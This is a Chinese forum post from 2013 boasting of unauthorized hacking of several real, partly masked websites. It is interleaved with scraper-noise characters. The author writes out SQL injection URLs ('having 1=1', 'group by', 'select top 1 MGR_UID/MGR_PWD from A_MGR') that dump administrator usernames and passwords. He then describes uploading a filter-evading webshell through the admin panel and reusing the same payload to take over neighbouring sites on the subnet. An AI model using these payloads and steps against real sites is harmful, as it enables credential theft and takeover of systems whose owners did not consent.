发现一个注入点
7 @+ e1 L' [" u. ?6 D Shttp://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
1 r, H/ l7 Q2 r( [/ Q& s
5 R. w6 @4 Y$ G! N7 S1 G, {8 d+ k习惯性的加’having1=1--7 g- P% h8 q# E P$ Q" r3 k" c! T
; |( R% P! V' W* y ?0 ~0 p. S
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—
' J+ X0 H0 y3 V; N' k/ L8 J1 n5 z* e r/ ~5 Q( @7 Y) W+ _
0
. s# Y, ]* V* o) V/ ?2 D- f2 t# m6 M8 S! m) Y' l
爆出Diary_A.dl_Title(这时候很激动啊), ?' J# \$ r7 _2 K
' c9 O+ {0 g2 j! a! ~4 S% m那么继续
/ F- M: f2 `5 ahttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—! o4 ], B! x9 v F+ T# ]
6 v' H6 F9 K% H6 r) L% l8 K继续,一直爆下去
& d8 q9 R" j& w
/ X9 ~/ o1 J- t爆到几个字段和表段 但是没找到需要的管理用户的字段
+ T2 Q2 y7 U7 @8 Y' l& A1 G [' Q' I. A' M# j+ z+ }7 c
蛋疼了 怎么办 然后去后台登陆页看源码1 p5 Q8 \4 {8 I0 w1 a
' t V# y0 M+ h1 E
0
3 X/ s9 n/ k5 z" u, R# o' Y
; b: h/ ~3 b0 j; K; h" r3 Y9 kInput name= “ADUID”
/ s; x+ h5 K: L+ j4 \+ V" CInput name= “ADPWD”6 k" N/ S, |4 l
H, L2 J: d) ^" K' W8 Y0 l
很幸运 找到了字段那就继续
* ?' M+ |) G, Q, Y- H& h+ {7 ]: P找到之后开始爆用户7 d' ~: L# I$ E; V5 T
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—0 Q: s8 M5 z9 B( f6 T, o$ g2 R) J
爆密码* z( e/ G; }5 T0 o
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—
& k: ]# E. {6 {; D$ e1 q测试了下 这个注入点只能爆到文章哪里的表 & |% K* w9 h5 h9 `2 z
' P& e3 x/ o- d1 Q. a$ J$ J4 {! v头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了
: S8 o. E. S, z" s
- O; P+ R |* {. v又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了
* L; [5 g: Z8 N
( P* @8 g4 }. X/ ~! c/ |473
5 a6 X( d: [( d' s2 R3 t" B" C* Z/ c) Y' O( b
进后台6 H: n: }* }3 E+ K
' s4 V x$ j: L; G `* ~
$ P* N5 {7 j: l$ H. k发现几个上传点 有的地方不能上传 而且防止恶意代码
( c$ r, m) Q7 A% H* P) Y* {1 W9 X6 X5 Y* r
没办法 各种百度各种找大牛 找到一只好像可以突破的马
- [) x/ {0 Y! s' ~$ X& r4 \2 I5 o0 a
4 N$ i7 H. P6 y, i: Z5 S: q: D在系统管理那里直接上传 不过没有显示地址
% u K W$ Z: y, v! B! k5 W2 l2 w; J1 F
再上传一次 抓包 搞定OK$ ?) E: G( r0 ~3 V
; q# f N$ q2 o {& H# w/ h3 i0 K8 ]- c! @! s# g# O
* V% n4 }( o% w& @
4723 G* [( \- c9 e
- @! M6 V a0 I1 j+ o+ H晚上不行了 去睡觉。。。0 [8 Z3 T; z( A5 h
第二天刚起床 闲的没事做继续日站吧
! H6 m9 |$ y, |& M3 s( c& o+ v, D' d5 n) T9 ~
找个站 就把这个站的旁c扫了下+ u# _' Y8 S: ?1 _9 b B
4 v& ]% w3 c( P/ N+ G W
发现c段也有一个购物站 ,然后还和这个站的模板差不多6 _, P O8 Z) T
! S! k$ `* v. }5 b4 |4 G
就找到会员登录口测试
/ } {; F$ m+ D0 m* U$ w7 |% G3 @
' E6 x/ Y! m8 y" h'and (select top 1 MGR_UID from A_MGR)>0—
$ A# H7 f, W* A! b' l果断爆到了 这时候我很激动 通杀
% F9 L$ R" s2 {1 I" u+ B$ C( z7 F9 V0 R! Z
再次翻c段7 S. F: q+ X$ T2 I3 H4 @0 P
% H1 S6 `( [( Z翻出几个站 都成功拿下
1 m" {0 l1 i5 v3 E+ k9 r
0 h+ [2 X3 Q/ M7 J
7 V0 ?( J7 ^+ H. x$ K% E- g; W( U5 B! z' p) \$ c- j4 p
修复方案:/ c: L& u" ^# j- G/ q9 z$ U7 z
他们比我专业
7 z4 }4 q1 c/ W2 M4 b4 P) z9 d" \: L4 T3 }0 T4 ~8 {4 L
. [% }4 Z& G- e( b9 Y3 q p9 i: |2 E/ X
|
发表于 2013-4-4 17:40:38
收藏
支持
反对